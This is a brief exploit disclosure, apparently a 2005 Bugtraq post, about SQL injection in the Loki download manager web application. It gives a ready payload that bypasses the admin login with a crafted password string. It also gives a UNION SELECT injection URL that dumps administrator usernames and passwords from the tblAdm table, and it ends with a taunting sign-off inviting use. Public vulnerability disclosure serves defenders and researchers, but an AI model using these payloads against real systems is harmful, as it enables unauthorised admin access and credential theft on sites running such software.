QUOTE
SQL injection in Loki download manager
1. in http://localhost/adm/default.asp
user: anyuser
pass: 'or''='
2. in http://localhost/downmancv/catinfo.asp?cat=' union select null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM tblAdm '
and u will have user and pass h4ve F4n
Salmanooh
Source: http://seclists.org/lists/bugtraq/2005/Jun/0047.html
